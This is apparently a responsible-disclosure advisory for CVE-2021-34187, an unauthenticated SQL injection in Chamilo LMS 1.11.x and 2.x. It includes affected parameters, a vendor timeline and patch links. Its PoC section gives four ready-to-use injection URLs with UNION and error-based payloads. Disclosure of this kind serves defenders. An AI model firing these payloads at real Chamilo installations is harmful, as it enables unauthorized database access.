CVE-2021-34187. Unauthenticated SQL injection in Chamilo LMS 1.11.x and (dev version of) 2.0

Product: Chamilo LMS 1.11.x, 2.x

Vulnerability: SQL injection

Author: Kutlymurat Mambetniyazov (@manfromkz)

Acknowledgements: NitroTeam.kz

Date: 05/25/2021

Description: Lack of sanitization of GET-parameters searchField, filters, filters2 in /main/inc/ajax/model.ajax.php leads to the multiple unauthorized SQL injections

Tested on: Windows 10 x64, Apache 2.4, 10.3.22-MariaDB, PHP 7.4, Chamilo LMS 1.11.x and 2.x.

PoC:

Version 1.11.x, parameter – searchField

http://chamilo1.11.x/main/inc/ajax/model.ajax.php?a=get_sessions_tracking&work_id=1&rows=0&page=1&sidx=0&sord=test&_search=1&searchField=1))and(1)%20UNION%20ALL%20SELECT%20CONCAT((select+version())),NULL,NULL,NULL--%20-)and((1=&searchOper=ni&searchString=testx&filters2={}&from_course_session=0

Version 2.x, parameter – searchField

http://chamilo2.x/main/inc/ajax/model.ajax.php?a=get_sessions_tracking&work_id=1&rows=0&page=1&sidx=0&sord=test&_search=1&searchField=1))and(1)%20UNION%20ALL%20SELECT%20CONCAT((select+extractvalue(0x0a,concat(0x0a,(version()))))),NULL,NULL,NULL--%20-)and((1=&searchOper=ni&searchString=testx&filters2={}&from_course_session=0

Parameters: filters, filters2

http://chamilo/main/inc/ajax/model.ajax.php?a=get_sessions_tracking&work_id=1&rows=0&page=1&sidx=0&sord=test&_force_search=1&search=1&searchField=1&searchOper=ni&searchString=testx&filters={%22rules%22:[{%22field%22:%221))union%20select%20version(),2,3,4--%20-%22,%22op%22:%22in%22,%22data%22:%22test%22}],%22groupOp%22:%22and%22}&from_course_session=0
http://chamilo/main/inc/ajax/model.ajax.php?a=get_sessions_tracking&work_id=1&rows=0&page=1&sidx=0&sord=test&_force_search=1&search=1&searchField=1&searchOper=ni&searchString=testx&filters2={%22rules%22:[{%22field%22:%221))union%20select%20version(),2,3,4--%20-%22,%22op%22:%22in%22,%22data%22:%22test%22}],%22groupOp%22:%22and%22}&from_course_session=0

Timeline of the vulnerability:

05/25/2021 – vulnerability discover
05/27/2021 – notification to vendor
05/28/2021 – confirmation by vendor and patch release (version 1.11.x – https://github.com/chamilo/chamilo-lms/commit/f7f93579ed64765c2667910b9c24d031b0a00571 and version 2.x – https://github.com/chamilo/chamilo-lms/commit/005dc8e9eccc6ea35264064ae09e2e84af8d5b59)
06/01/2021 – published on vendors issue tracker (https://support.chamilo.org/projects/1/wiki/Security_issues#Issue-67-2021-05-27-High-impact-very-high-risk-Unauthenticated-SQL-injection)
06/20/2021 – published
06/28/2021 – CVE-2021-34187 was assigned by MITRE

Leave a comment

Your email address will not be published. Required fields are marked *